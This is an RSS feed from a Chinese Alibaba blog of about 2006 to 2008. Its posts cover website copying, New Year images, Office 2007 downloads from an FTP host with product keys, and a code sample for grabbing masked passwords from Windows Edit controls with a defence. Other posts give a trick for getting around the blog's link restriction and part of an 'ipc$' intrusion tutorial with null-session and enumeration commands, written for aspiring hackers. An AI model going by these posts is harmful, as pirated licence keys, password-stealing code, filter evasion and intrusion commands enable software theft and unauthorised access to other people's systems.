<?xml version="1.0" encoding="GB2312"?>
<?xml-stylesheet type="text/css" href="http://img.china.alibaba.com/blog/html/css/rsstyle.css"?>
<rss version="2.0">
   <channel>
      <!--博客名-->
      <title>建站铺</title>
      
      <!--作者头像信息-->
      <image>
          <title>智慧电脑的会员档案</title>
          <link><![CDATA[http://profile.china.alibaba.com/user/2784477.html]]></link>
          <url>http://img.china.alibaba.com/club/upload/pic/user/2/7/8/4/2784477_s.jpeg</url>
      </image>
      
	      <!--博客描述-->
      <description>
                          山不在高，有仙则名。水不在深，有龙则灵。斯是陋室，唯吾德馨。	
                </description>
      
      <!--文章/评论/访问数-->
      <articleCnt>34</articleCnt>
      <commentCnt>30</commentCnt>
      <visitCnt>13948</visitCnt>
      
      <!--作者分类信息-->
      <category>商人博客</category>
      <language>zh-cn</language>
      <pubDate>2008/07/07 01:56:15</pubDate>
      <lastBuildDate>Tue, 01 Apr 2008 14:51:44 CST</lastBuildDate>
      <generator>http://blog.china.alibaba.com</generator>      
      
      <!--此处添加了作者笔名-->
      <webMaster></webMaster>      
            
      <!--此处添加作者朋友信息, 每个好友一项-->   
            <!--个人博客首页-->
      <link><![CDATA[http://2784477.blog.china.alibaba.com]]></link>
      <managingEditor>智慧电脑</managingEditor>
      
      
      <!-- 此处提取blog文章信息, 每篇文章一项 -->
            <item>
         <title><![CDATA[ 看看至少500个网站都是抄我们的,连公司名字都不改 ]]></title>
         <link><![CDATA[http://blog.china.alibaba.com/blog/2784477/article/b4-i2141281.html]]></link>
                          <description>
                   <![CDATA[<p>看看多少网站都是抄来抄去,连公司名字都不改</p>
<p>在百度里面搜索&quot;建站铺&quot;</p>
<p>从第二页开始,都是抄的我们网站</p>]]>
               </description>
                    <author>智慧电脑</author>
         <category>个人博客</category>
                      <label domain="http://blog.china.alibaba.com/blog/2784477/tag/zfjJzLjQzvI=.html">网商感悟</label>
         	                  <pubDate>2007/06/02 18:11:05</pubDate>
      </item>
            <item>
         <title><![CDATA[ 建站铺论坛祝阿里巴巴所有会员,猪年到了，我精挑细选了126张新年祝福图片送给 ]]></title>
         <link><![CDATA[http://blog.china.alibaba.com/blog/2784477/article/b9-i1718022.html]]></link>
                          <description>
                   <![CDATA[<p>猪年到了，我精挑细选了126张新年祝福图片送给您！希望您在新的一年里身体健康、学习进步、工作顺利、事业有成、生活甜蜜、合家欢乐！！！</p>
<p>
<table cellspacing="0" cellpadding="3" width="816" align="center" class="bk">
    <tbody>
        <tr>
            <td width="128"><a target="_blank" href="http://bbs.jzpu.com/"><img height="128" alt="祝您猪年快乐！" width="128" border="0" src="http://bbs.jzpu.com/2007/85.gif" /></a></td>
            <td width="128"><a target="_blank" href="http://bbs.jzpu.com/"><img height="128" alt="祝您猪年快乐！" width="128" border="0" src="http://bbs.jzpu.com/2007/120.gif" /></a></td>
            <td width="128"><a target="_blank" href="http://bbs.jzpu.com/"><img height="128" alt="祝您猪年快乐！" width="128" border="0" src="http://bbs.jzpu.com/2007/136.gif" /></a></td>
            <td width="128"><a target="_blank" href="http://bbs.jzpu.com/"><img height="128" alt="祝您猪年快乐！" width="128" border="0" src="http://bbs.jzpu.com/2007/144.gif" /></a></td>
            <td width="128"><a target="_blank" href="http://bbs.jzpu.com/"><img height="128" alt="祝您猪年快乐！" width="128" border="0" src="http://bbs.jzpu.com/2007/83.gif" /></a></td>
            <td width="128"><a target="_blank" href="http://bbs.jzpu.com/"><img height="128" alt="祝您猪年快乐！" width="128" border="0" src="http://bbs.jzpu.com/2007/58.gif" /></a></td>
        </tr>
        <tr>
            <td><a target="_blank" href="http://bbs.jzpu.com/"><img height="128" alt="祝您猪年快乐！" width="128" border="0" src="http://bbs.jzpu.com/2007/126.gif" /></a></td>
            <td><a target="_blank" href="http://bbs.jzpu.com/"><img height="128" alt="祝您猪年快乐！" width="128" border="0" src="http://bbs.jzpu.com/2007/155.gif" /></a></td>
            <td><a target="_blank" href="http://bbs.jzpu.com/"><img height="128" alt="祝您猪年快乐！" width="128" border="0" src="http://bbs.jzpu.com/2007/70.gif" /></a></td>
            <td><a target="_blank" href="http://bbs.jzpu.com/"><img height="128" alt="祝您猪年快乐！" width="128" border="0" src="http://bbs.jzpu.com/2007/128.gif" /></a></td>
            <td><a target="_blank" href="http://bbs.jzpu.com/"><img height="128" alt="祝您猪年快乐！" width="128" border="0" src="http://bbs.jzpu.com/2007/46.gif" /></a></td>
            <td><a target="_blank" href="http://bbs.jzpu.com/"><img height="128" alt="祝您猪年快乐！" width="128" border="0" src="http://bbs.jzpu.com/2007/52.gif" /></a></td>
        </tr>
        <tr>
            <td><a href="http://bbs.jzpu.com/"><img height="128" alt="祝您猪年快乐！" width="128" border="0" src="http://bbs.jzpu.com/2007/32.gif" /></a></td>
            <td><a target="_blank" href="http://bbs.jzpu.com/"><img height="128" alt="祝您猪年快乐！" width="128" border="0" src="http://bbs.jzpu.com/2007/33.gif" /></a></td>
            <td><a target="_blank" href="http://bbs.jzpu.com/"><img height="128" alt="祝您猪年快乐！" width="128" border="0" src="http://bbs.jzpu.com/2007/34.gif" /></a></td>
            <td><a target="_blank" href="http://bbs.jzpu.com/"><img height="128" alt="祝您猪年快乐！" width="128" border="0" src="http://bbs.jzpu.com/2007/35.gif" /></a></td>
            <td><a target="_blank" href="http://bbs.jzpu.com/"><img height="128" alt="祝您猪年快乐！" width="128" border="0" src="http://bbs.jzpu.com/2007/36.gif" /></a></td>
            <td><a target="_blank" href="http://bbs.jzpu.com/"><img height="128" alt="祝您猪年快乐！" width="128" border="0" src="http://bbs.jzpu.com/2007/37.gif" /></a></td>
        </tr>
        <tr>
            <td><a target="_blank" href="http://bbs.jzpu.com/"><img height="128" alt="http://www.sz15.cn" width="128" border="0" src="http://bbs.jzpu.com/2007/20.gif" /></a></td>
            <td><a target="_blank" href="http://bbs.jzpu.com/"><img height="128" alt="http://www.sz15.cn" width="128" border="0" src="http://bbs.jzpu.com/2007/21.gif" /></a></td>
            <td><a target="_blank" href="http://bbs.jzpu.com/"><img height="128" alt="http://www.sz15.cn" width="128" border="0" src="http://bbs.jzpu.com/2007/22.gif" /></a></td>
            <td><a target="_blank" href="http://bbs.jzpu.com/"><img height="128" alt="祝您猪年快乐！" width="128" border="0" src="http://bbs.jzpu.com/2007/23.gif" /></a></td>
            <td><a target="_blank" href="http://bbs.jzpu.com/"><img height="128" alt="祝您猪年快乐！" width="128" border="0" src="http://bbs.jzpu.com/2007/24.gif" /></a></td>
            <td><a target="_blank" href="http://bbs.jzpu.com/"><img height="128" alt="欢迎到访www.sz15.cn" width="128" border="0" src="http://bbs.jzpu.com/2007/25.gif" /></a></td>
        </tr>
    </tbody>
</table>
</p>]]>
               </description>
                    <author>智慧电脑</author>
         <category>个人博客</category>
                      <label domain="http://blog.china.alibaba.com/blog/2784477/tag/zfjJzLjQzvI=.html">网商感悟</label>
         	                  <pubDate>2007/03/01 09:41:19</pubDate>
      </item>
            <item>
         <title><![CDATA[ Microsoft Office 2007简体中文版 (企业版+专业版) ]]></title>
         <link><![CDATA[http://blog.china.alibaba.com/blog/2784477/article/b0-i1353766.html]]></link>
                          <description>
                   <![CDATA[<span class="bold">Microsoft Office 2007简体中文版 (企业版+专业版) FTP高速下载！！！</span><br />
<br />
<table width="100%" border="0">
    <tbody>
        <tr>
            <td style="FONT-SIZE: 12px" valign="top" width="100%">Ｍicrosoft Ｏffice ２007 全系列迅雷下载!!!No BT!!!&nbsp;&nbsp;&nbsp;&nbsp;<br />
            <br />
            <br />
            Microsoft Office Professional Plus 2007 简体中文版 （<strong><font color="#ff0000">专业版</font></strong>）<br />
            <a target="_blank" href="ftp://test:test@ribbitar.3322.org/Microsoft.Office.Professional.Plus.2007.iso">ftp://test:test@ribbitar.3322.or ... ional.Plus.2007.iso</a><br />
            <br />
            <br />
            <br />
            Microsoft Office Enterprise 2007 简体中文版 （<strong><font color="#ff0000">企业版</font></strong>）<br />
            <a target="_blank" href="ftp://test:test@ribbitar.3322.org/Microsoft.Office.Enterprise.2007.iso">ftp://test:test@ribbitar.3322.or ... Enterprise.2007.iso</a><br />
            <br />
            <br />
            <br />
            Microsoft Office SharePoint Designer 2007 简体中文版&nbsp;&nbsp;（<strong><font color="#ff0000">SharePoint Designer 即原来 的 FrontPage</font></strong>）<br />
            <a target="_blank" href="ftp://test:test@ribbitar.3322.org/Microsoft.Office.SharePoint.Designer.2007.iso">ftp://test:test@ribbitar.3322.or ... t.Designer.2007.iso</a><br />
            <br />
            <br />
            <br />
            Microsoft Office Visio 2007 简体中文版<br />
            <a target="_blank" href="ftp://test:test@ribbitar.3322.org/Microsoft.Office.Visio.2007.iso">ftp://test:test@ribbitar.3322.org/Microsoft.Office.Visio.2007.iso</a><br />
            <br />
            <br />
            <br />
            序列号：&nbsp; &nbsp; W2JJW-4KYDP-2YMKW-FX36H-QYVD8<br />
            <br />
            &nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp; DBXYD-TF477-46YM4-W74MH-6YDQ8<br />
            <br />
            &nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;<br />
            Office 2007 Suites<br />
            DBXYD-TF477-46YM4-W74MH-6YDQ8<br />
            <br />
            Office 2007 Applications<br />
            W2JJW-4KYDP-2YMKW-FX36H-QYVD8<br />
            <br />
            <br />
            <br />
            必须右键迅雷下载，否则下载无效！！！无限线程！！！<br />
            <br />
            -------------------------------------------------------------------------------------------------------------------------------------<br />
            <br />
            企业版比专业版多2个组件： OneNote&reg; 2007&nbsp;&nbsp;和&nbsp;&nbsp;Groove&reg; 2007<br />
            <br />
            --------------------------------------------------------------------------------------------------------------------------------------<br />
            <br />
            大企业版比专业版功能要强一些，推荐下载大企业版！<br />
            <br />
            <br />
            1.Microsoft Office Enterprise 2007 包含以下内容：<br />
            <br />
            &bull;Microsoft Office Excel&reg; 2007<br />
            &bull;Microsoft Office Outlook&reg; 2007<br />
            &bull;Microsoft Office PowerPoint&reg; 2007<br />
            &bull;Microsoft Office Word 2007<br />
            &bull;Microsoft Office Access 2007<br />
            &bull;Microsoft Office InfoPath&reg; 2007<br />
            &bull;Microsoft Office Communicator<br />
            &bull;Microsoft Office Publisher 2007<br />
            &bull;Microsoft Office OneNote&reg; 2007<br />
            &bull;Microsoft Office Groove&reg; 2007<br />
            &bull;集成的解决方案能力，比如企业内容管理（ECM），电子表单以及信息权限及策略管理能力。<br />
            <br />
            <br />
            <br />
            2.Microsoft Office Professional Plus 2007 包含以下内容：<br />
            <br />
            &bull;Microsoft Office Excel 2007<br />
            &bull;Microsoft Office Outlook 2007<br />
            &bull;Microsoft Office PowerPoint 2007<br />
            &bull;Microsoft Office Word 2007<br />
            &bull;Microsoft Office Access 2007<br />
            &bull;Microsoft Office InfoPath 2007<br />
            &bull;Microsoft Office Communicator<br />
            &bull;Microsoft Office Publisher 2007<br />
            &bull;集成的解决方案能力，比如企业内容管理（ECM），电子表单以及信息权限及策略管理能力。<br />
            </td>
        </tr>
    </tbody>
</table>]]>
               </description>
                    <author>智慧电脑</author>
         <category>个人博客</category>
                      <label domain="http://blog.china.alibaba.com/blog/2784477/tag/zfjC58n6u+4=.html">网络生活</label>
         	                  <pubDate>2006/11/23 22:40:08</pubDate>
      </item>
            <item>
         <title><![CDATA[ 电脑技巧-黑客窃取密码的原理及防范 ]]></title>
         <link><![CDATA[http://blog.china.alibaba.com/blog/2784477/article/b9-i1270149.html]]></link>
                          <description>
                   <![CDATA[<p><font color="#008000" size="4"><strong>黑客窃取密码的原理及防范</strong></font><br />
<br />
一、非法获取Password的原理：<br />
<br />
　　Edit控件是Windows的一个标准控件，当把其Password属性设为True时,就会将输入的内容屏蔽为星号，从而达到保护的目的。虽然我们看来都是星号，但程序中的Edit控件实际仍是用户输入的 密码，应用程序可以获取该控件中的密码，其他应用程序也可以通过向其发送WM_GETTEXT或EM_GETLINE消息来获取Edit控件中的内容。黑客程序正是利用Edit控件的这个特性，当发现当前探测的窗口是Edit控件并且具有ES_PASSWORD属性时，则通过SendMessage向此窗口发送WM_GETTEXT或EM_GETLINE消息，这样Edit框中的内容就一目了然了。<br />
<br />
　　二、黑客软件工作方法<br />
<br />
　　首先要取得当前的窗口，并判断是否是Edit控件，一般多通过鼠标来指定要探测的窗口，例如在WM_MOUSEMOVE消息的响应函数中进行判断，现列举代码片段如下：<br />
<br />
　　//将客户坐标转换成屏幕坐标<br />
　　ClientToScreen(&amp;point)；<br />
　　//返回一个包含指定屏幕坐标点的窗口<br />
　　CWnd* pWnd = CWnd::WindowFromPoint(point)；<br />
　　if (pWnd)<br />
　　{<br />
　　//获取窗口句柄<br />
　　HWND hwndCurr = pWnd-&gt;GetSafeHwnd()；<br />
　　if ((::GetWindowThreadProcessId (GetSafeHwnd(), NULL)) != (::GetWindowThreadProcessId (hwndCurr, NULL)))<br />
　　{<br />
　char lpClassName[255]；<br />
　　//获取类名<br />
　　if (::GetClassName(hwndCurr, lpClassName, 255))<br />
　　{<br />
　　//判断是否是Edit控件<br />
　　if (0 == m_strWndClass.CompareNoCase(&quot;EDIT&quot;))<br />
　　{<br />
　　//获取窗口风格<br />
　　LONG lStyle = ::GetWindowLong(hwndCurr, GWL_STYLE)；<br />
　　//如果设置了ES_PASSWORD属性<br />
　　if (lStyle &amp; ES_PASSWORD)<br />
　　{<br />
　　char szText[255]；<br />
　　//通过掌握的句柄hwndCurr向此控件发送WM_GETTEXT消息<br />
　　::SendMessage(hwndCurr, WM_GETTEXT, 255, (LPARAM)szText)； //密码已保存在szText中<br />
　　m_strPassword = szText；<br />
　　}<br />
　　}<br />
　　}<br />
　　}<br />
　　}<br />
<br />
　　上述代码中值得注意的有以下几个关键地方：<br />
<br />
　　ClientToScreen(&amp;point)；<br />
　　CWnd* pWnd = CWnd::WindowFromPoint(point)；<br />
　　HWND hwndCurr = pWnd-&gt;GetSafeHwnd()；<br />
<br />
　　这三句代码可以获取当前鼠标位置所在窗口的窗口句柄，在SendMessage中要用到的。<br />
<br />
　　::SendMessage(hwndCurr, WM_GETTEXT, 255, (LPARAM)szText)；<br />
<br />
　　这便是真正起作用的SendMessage了，其第一个参数指定了要接收消息的窗口句柄，我们已经通过上面的代码获取到了，第二个参数就是让Edit控件返回字符的WM_GETTEXT消息了，并将得到的内容保存在szText中。<br />
<br />
　　三、防范措施<br />
<br />
　　既然我们搞清除了黑客软件普遍采取的手法，那我们自然能制订出一套防范其攻击的措施来。下面我们就要对Password进行保护。<br />
<br />
　　从以上分析我们可以看出：Edit控件的漏洞主要在于没有对发送WM_GETTEXT或EM_GETLINE消息者的身份进行检查，只要能找到Edit窗口句柄，任何进程都可获取其内容。所以必须要对发送消息者的身份进行验证，这里给出一种方法来验证发送消息者的身份是否合法：<br />
<br />
　　1.创建新CEdit类<br />
<br />
　　从CEdit继承一个子类CPasswordEdit,申明全局变量g_bSenderIdentity表明消息发送者的身份: BOOL g_bSenderIdentity；<br />
<br />
　　然后响应CWnd的虚函数DefWindowProc,在这个回调函数中进行身份验证<br />
LRESULTCPasswordEdit:efWindowProc (UINTmessage,WPARAMwParam,LPARAMlParam)<br />
　　{<br />
　　//对Edit的内容获取必须通过以下两个消息之一<br />
　　if((message==WM_GETTEXT) ||(message==EM_GETLINE))<br />
　　{<br />
　　//检查是否为合法<br />
　　if(!g_bSenderIdentity)<br />
　　{<br />
　　//非法获取,显示信息<br />
　　AfxMessageBox(_T (&quot;报告：正在试图窃取密码！&quot;))；<br />
　　return 0；<br />
　　}<br />
　　//合法获取<br />
　　g_bSenderIdentity=FALSE；<br />
　　}<br />
　　return CEdit:efWindowProc (message,wParam,lParam)；<br />
　　}<br />
<br />
　　2.在数据输入对话框中做些处理<br />
<br />
　　在对话框中申明一个类成员m_edtPassword:<br />
<br />
　　CpasswordEdit m_edtPassword；<br />
<br />
　　然后在对话框的OnInitDialog()中加入下列代码:<br />
　　m_edtPassword.SubclassDlgItem(IDC_EDIT_PASSWORD,this)；<br />
<br />
　　将控制与新类做关联。<br />
<br />
　　之后要在对话框的数据交换函数中将身份设为合法:<br />
<br />
　　void CDlgInput:oDataExchange (CDataExchange＊pDX)<br />
　　{<br />
　　//如果获取数据<br />
　　//注意：对于CPropertyPage类这里不需要 if (pDX－&gt;m_bSaveAndValidate)条件<br />
　　if(pDX－&gt;m_bSaveAndValidate)<br />
　　{<br />
　　g_bSenderIdentity=TRUE；<br />
　　}<br />
　　CDialog:oDataExchange(pDX)；<br />
　　//{{AFX_DATA_MAP(CDlgInput)<br />
　　DDX_Text (pDX,IDC_EDIT_PASSWORD,m_sPassword)；<br />
　　//}}AFX_DATA_MAP<br />
　　}<br />
<br />
　　这样，Password输入框就拥有了合法身份，会受到保护。<br />
<br />
　　结论：<br />
<br />
　　以上的方法仅针对VC程序，对于其他语言如VB、Delphi等语言，需要借助VC做一个Password的ActiveX控件，实现方法与上述方法基本类似。以上程序均用VisualC＋＋6.0编制调试通过。<br />
</p>]]>
               </description>
                    <author>智慧电脑</author>
         <category>个人博客</category>
                      <label domain="http://blog.china.alibaba.com/blog/2784477/tag/zfjC58n6u+4=.html">网络生活</label>
         	                  <pubDate>2006/11/04 09:56:33</pubDate>
      </item>
            <item>
         <title><![CDATA[ 告诉大家一个阿里博客秘密 ]]></title>
         <link><![CDATA[http://blog.china.alibaba.com/blog/2784477/article/b9-i1270144.html]]></link>
                          <description>
                   <![CDATA[告诉大家一个阿里博客秘密 大家是不是在添加链接是提示 &quot;友情链接仅允许添加阿里巴巴的个人博客&quot; 只要大家在添加的网址后面加上&quot;#.blog.china.alibaba.com/&quot; 博客名称:智慧电脑 如&quot;http://www.zwdq.com#.blog.china.alibaba.com/&quot; 演示见: http://2784477.blog.china.alibaba.com/?asker=ATC&amp;&amp;needsignin=1]]>
               </description>
                    <author>智慧电脑</author>
         <category>个人博客</category>
                      <label domain="http://blog.china.alibaba.com/blog/2784477/tag/zfjC58n6u+4=.html">网络生活</label>
         	                  <pubDate>2006/11/04 09:55:13</pubDate>
      </item>
            <item>
         <title><![CDATA[ 电脑技巧-ipc$详细解说大全 ]]></title>
         <link><![CDATA[http://blog.china.alibaba.com/blog/2784477/article/b9-i1270138.html]]></link>
                          <description>
                   <![CDATA[<p><font color="#008000" size="4"><strong>ipc$详细解说大全</strong></font></p>
<p><font color="#ff0000" size="3">[照旧，用CTRL+F&hellip;&hellip;]</font><br />
<br />
<strong><font color="#9900ff">01- 前言<br />
02- 什么是ipc$<br />
03- 什么是空会话<br />
04- 空会话可以做什么<br />
05- ipc$连接所使用的端口<br />
06- ipc$连接在hack攻击中的意义<br />
07- ipc$连接失败的常见原因<br />
08- 复制文件失败的原因<br />
09- 如何打开目标的IPC$共享以及其他共享<br />
10- 一些需要shell才能完成的命令<br />
11- 入侵中可能会用到的相关命令<br />
12- ipc$完整入侵步骤</font></strong><font color="#9900ff"><strong>详</strong></font><strong><font color="#9900ff">解<br />
13- 如何防范ipc$入侵<br />
14- ipc$入侵问答精选<br />
15- 结束的话</font></strong><br />
<br />
<br />
<br />
<br />
<br />
<br />
<font color="#9900ff"><strong>一 前言</strong></font><br />
<br />
网上关于ipc$入侵的文章可谓多如牛毛，而且也不乏优秀之作，攻击步骤甚至可以说已经成为经典的模式，因此也没人愿意再把这已经成为定式的东西拿出来摆弄。<br />
不过话虽这样说，但我个人认为这些文章讲解的并不详细，对于第一次接触ipc$的菜鸟来说，简单的罗列步骤并不能解答他们的种种迷惑（你随便找一个hack论坛搜一下ipc$，看看存在的疑惑有多少）。因此我参考了网上的一些资料，教程以及论坛帖子，写了这篇总结性质的文章，想把一些容易混淆，容易迷惑人的问题说清楚，让大家不要总徘徊在原地!<br />
注意：本文所讨论的各种情况均默认发生在win NT/2000环境下，win98将不在此次讨论之列，而鉴于win Xp在安全设置上有所提高，个别操作并不适用，有机会将单独讨论。<br />
<br />
<br />
<font color="#9900ff"><strong>二 什么是ipc$</strong></font><br />
<br />
<br />
IPC$(Internet Process Connection)是共享&quot;命名管道&quot;的资源，它是为了让进程间通信而开放的命名管道，通过提供可信任的用户名和口令，连接双方可以建立安全的通道并以此通道进行加密数据的交换，从而实现对远程计算机的访问。IPC$是NT/2000的一项新功能，它有一个特点，即在同一时间内，两个IP之间只允许建立一个连接。NT/2000在提供了ipc$功能的同时，在初次安装系统时还打开了默认共享，即所有的逻辑共享(c$,d$,e$&hellip;&hellip;)和系统目录winnt或windows(admin$)共享。所有的这些，微软的初衷都是为了方便管理员的管理，但在有意无意中，导致了系统安全性的降低。<br />
平时我们总能听到有人在说ipc$漏洞，ipc$漏洞，其实ipc$并不是一个真正意义上的漏洞,我想之所以有人这么说，一定是指微软自己安置的那个&lsquo;后门&rsquo;：空会话（Null session）。那么什么是空会话呢？<br />
<br />
<br />
<font color="#9900ff"><strong><br />
三 什么是空会话</strong></font><br />
<br />
<br />
在介绍空会话之前，我们有必要了解一下一个安全会话是如何建立的。<br />
在Windows NT 4.0中是使用挑战响应协议与远程机器建立一个会话的，建立成功的会话将成为一个安全隧道，建立双方通过它互通信息，这个过程的大致顺序如下：<br />
1）会话请求者（客户）向会话接收者（服务器）传送一个数据包，请求安全隧道的建<br />
立；<br />
2）服务器产生一个随机的64位数（实现挑战）传送回客户；<br />
3）客户取得这个由服务器产生的64位数，用试图建立会话的帐号的口令打乱它，将结<br />
果返回到服务器（实现响应）；<br />
4）服务器接受响应后发送给本地安全验证（LSA），LSA通过使用该用户正确的口令来核实响应以便确认请求者身份。如果请求者的帐号是服务器的本地帐号，核实本地发生；如果请求的帐号是一个域的帐号，响应传送到域控制器去核实。当对挑战的响应核实为正确后，一个访问令牌产生，然后传送给客户。客户使用这个访问令牌连接到服务器上的资源直到建议的会话被终止。<br />
以上是一个安全会话建立的大致过程，那么空会话又如何呢？<br />
<br />
空会话是在没有信任的情况下与服务器建立的会话（即未提供用户名与密码），但根据WIN2000的访问控制模型，空会话的建立同样需要提供一个令牌，可是空会话在建立过程中并没有经过用户信息的认证，所以这个令牌中不包含用户信息，因此，这个会话不能让系统间发送加密信息，但这并不表示空会话的令牌中不包含安全标识符SID（它标识了用户和所属组），对于一个空会话，LSA提供的令牌的SID是S-1-5-7，这就是空会话的SID，用户名是：ANONYMOUS LOGON（这个用户名是可以在用户列表中看到的，但是是不能在SAM数据库中找到，属于系统内置的帐号），这个访问令牌包含下面伪装的组：<br />
Everyone<br />
Network<br />
在安全策略的限制下，这个空会话将被授权访问到上面两个组有权访问到的一切信息。那么建立空会话到底可以作什么呢？<br />
<br />
<br />
<font color="#9900ff"><strong>四 空会话可以做什么</strong></font><br />
<br />
<br />
对于NT，在默认安全设置下，借助空连接可以列举目标主机上的用户和共享，访问everyone权限的共享，访问小部分注册表等，并没有什么太大的利用价值；对2000作用更小，因为在Windows 2000 和以后版本中默认只有管理员和备份操作员有权从网络访问到注册表，而且实现起来也不方便，需借助工具。从这些我们可以看到，这种非信任会话并没有多大的用处，但从一次完整的ipc$入侵来看，空会话是一个不可缺少的跳板，因为我们从它那里可以得到户列表，这对于一个老练的黑客已经足够了。以下是空会话中能够使用的具体命令：<br />
<br />
<br />
1 首先，我们先建立一个空会话（需要目标开放ipc$）<br />
命令：net use \\ip\ipc$ &quot;&quot; /user:&quot;&quot;<br />
注意：上面的命令包括四个空格，net与use中间有一个空格，use后面一个，密码左右各一个空格。<br />
<br />
<br />
2 查看远程主机的共享资源<br />
命令：net view \\IP<br />
解释：建立了空连接后，用此命令可以查看远程主机的共享资源，如果它开了共享，可以得到如下类似类似结果：<br />
在 \\*.*.*.*的共享资源<br />
资源共享名 类型 用途 注释<br />
<br />
NETLOGON Disk Logon server share<br />
SYSVOL Disk Logon server share<br />
命令成功完成。<br />
<br />
<br />
3 查看远程主机的当前时间<br />
命令：net time \\IP<br />
解释：用此命令可以得到一个远程主机的当前时间。<br />
<br />
<br />
4 得到远程主机的NetBIOS用户名列表（需要打开自己的NBT）<br />
nbtstat -A IP<br />
用此命令可以得到一个远程主机的NetBIOS用户名列表（需要你的netbios支持），返回如下结果：<br />
<br />
Node IpAddress: [*.*.*.*] Scope Id: []<br />
<br />
NetBIOS Remote Machine Name Table<br />
<br />
Name Type Status<br />
---------------------------------------------<br />
SERVER &lt;00&gt; UNIQUE Registered<br />
OYAMANISHI-H &lt;00&gt; GROUP Registered<br />
OYAMANISHI-H &lt;1C&gt; GROUP Registered<br />
SERVER &lt;20&gt; UNIQUE Registered<br />
OYAMANISHI-H &lt;1B&gt; UNIQUE Registered<br />
OYAMANISHI-H &lt;1E&gt; GROUP Registered<br />
SERVER &lt;03&gt; UNIQUE Registered<br />
OYAMANISHI-H &lt;1D&gt; UNIQUE Registered<br />
..__MSBROWSE__.&lt;01&gt; GROUP Registered<br />
INet~Services &lt;1C&gt; GROUP Registered<br />
IS~SERVER......&lt;00&gt; UNIQUE Registered<br />
<br />
MAC Address = 00-50-8B-9A-2D-37<br />
<br />
以上就是我们经常使用空会话做的事情，好像也能获得不少东西哟，不过要注意一点：建立IPC$连接的操作会在EventLog中留下记录，不管你是否登录成功。 好了，那么下面我们就来看看ipc$所使用的端口是什么？<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<font color="#9900ff"><strong>五 ipc$所使用的端口</strong></font><br />
<br />
<br />
首先我们来了解一些基础知识：<br />
1 SMB:(Server Message Block) Windows协议族，用于文件打印共享的服务；<br />
2 NBT:(NETBios Over TCP/IP)使用137（UDP）138（UDP）139（TCP）端口实现基于TCP/IP协议的NETBIOS网络互联。<br />
3 在WindowsNT中SMB基于NBT实现，而在Windows2000中，SMB除了基于NBT实现，还可以直接通过445端口实现。<br />
<br />
有了这些基础知识，我们就可以进一步来讨论访问网络共享对端口的选择了：<br />
<br />
对于win2000客户端来说：<br />
1 如果在允许NBT的情况下连接服务器时，客户端会同时尝试访问139和445端口，如果445端口有响应，那么就发送RST包给139端口断开连接，用455端口进行会话，当445端口无响应时，才使用139端口，如果两个端口都没有响应，则会话失败；<br />
2 如果在禁止NBT的情况下连接服务器时，那么客户端只会尝试访问445端口，如果445端口无响应，那么会话失败。由此可见，禁止了NBT后的win 2000对win NT的共享访问将会失败。<br />
<br />
<br />
对于win2000服务器端来说：<br />
1 如果允许NBT, 那么UDP端口137, 138, TCP 端口 139, 445将开放；<br />
2 如果禁止NBT，那么只有445端口开放。<br />
<br />
<br />
我们建立的ipc$会话对端口的选择同样遵守以上原则。显而易见，如果远程服务器没有监听139或445端口，ipc$会话是无法建立的。<br />
<br />
<br />
<font color="#9900ff"><strong>六 ipc$连接在hack攻击中的意义</strong></font><br />
<br />
<br />
就像上面所说的，即使你建立了一个空的连接，你也可以获得不少的信息（而这些信息往往是入侵中必不可少的），如果你能够以某一个具有一定权限的用户身份登陆的话，那么你就会得到相应的权限，显然，如果你以管理员身份登陆,嘿嘿,那你可就了不得了，基本上可以为所欲为了。不过你也不要高兴的太早，因为管理员的密码不是那么好搞到的，虽然会有一些粗心的管理员存在弱口令，但这毕竟是少数，而且现在不比从前了，随着人们安全意识的提高，管理员们也愈加小心了，得到管理员密码将会越来越难的，因此今后你最大的可能就是以极小的权限甚至是没有权限进行连接，甚至在主机不开启ipc$共享时，你根本就无法连接，你会慢慢的发现ipc$连接并不是万能的，所以不要奢望每次连接都能成功，那是不现实的。<br />
是不是有些灰心？倒也不用,关键是我们要摆正心态，不要把ipc$入侵当作终极武器，不要认为它战无不胜,它只是很多入侵方法中的一种，你有可能利用它一击必杀，也有可能一无所获，这些都是正常的，在黑客的世界里，不是每条大路都能通往罗马，但总有一条路会通往罗马，耐心的寻找吧！<br />
</p>
<p><font color="#9900ff"><strong>七 ipc$连接失败的常见原因</strong></font><br />
<br />
以下是一些常见的导致ipc$连接失败的原因：<br />
<br />
<br />
1 IPC连接是Windows NT及以上系统中特有的功能，由于其需要用到Windows NT中很多DLL函数，所以不能在Windows 9.x/Me系统中运行，也就是说只有nt/2000/xp才可以相互建立ipc$连接，98/me是不能建立ipc$连接的；<br />
<br />
<br />
2 如果想成功的建立一个ipc$连接，就需要对方开启ipc$共享，即使是空连接也是这样，如果对方关闭了ipc$共享，你将会建立失败；<br />
<br />
<br />
3 你未启动Lanmanworkstation服务，它提供网络链结和通讯，没有它你无法发起连接请求（显示名为：Workstation）；<br />
<br />
<br />
4 对方未启动Lanmanserver服务，它提供了 RPC 支持、文件、打印以及命名管道共享，ipc$依赖于此服务，没有它远程主机将无法响应你的连接请求（显示名为：Server）；<br />
<br />
<br />
5 对方未启动NetLogon，它支持网络上计算机 pass-through 帐户登录身份；<br />
<br />
<br />
6 对方禁止了NBT（即未打开139端口）；<br />
<br />
<br />
7 对方防火墙屏蔽了139和445端口；<br />
<br />
<br />
8 你的用户名或者密码错误（显然空会话排除这种错误）；<br />
<br />
<br />
9 命令输入错误：可能多了或少了空格，当用户名和密码中不包含空格时两边的双引号可以省略，如果密码为空，可以直接输入两个引号&quot;&quot;即可；<br />
<br />
<br />
10 如果在已经建立好连接的情况下对方重启计算机，那么ipc$连接将会自动断开，需要重新建立连接。<br />
<br />
<br />
另外,你也可以根据返回的错误号分析原因：<br />
错误号5，拒绝访问：很可能你使用的用户不是管理员权限的，先提升权限；<br />
错误号51，Windows无法找到网络路径：网络有问题；<br />
错误号53，找不到网络路径：ip地址错误；目标未开机；目标lanmanserver服务未启动；目标有防火墙（端口过滤）；<br />
错误号67，找不到网络名：你的lanmanworkstation服务未启动或者目标删除了ipc$；<br />
错误号1219，提供的凭据与已存在的凭据集冲突：你已经和对方建立了一个ipc$，请删除再连；<br />
错误号1326，未知的用户名或错误密码：原因很明显了；<br />
错误号1792，试图登录，但是网络登录服务没有启动：目标NetLogon服务未启动；<br />
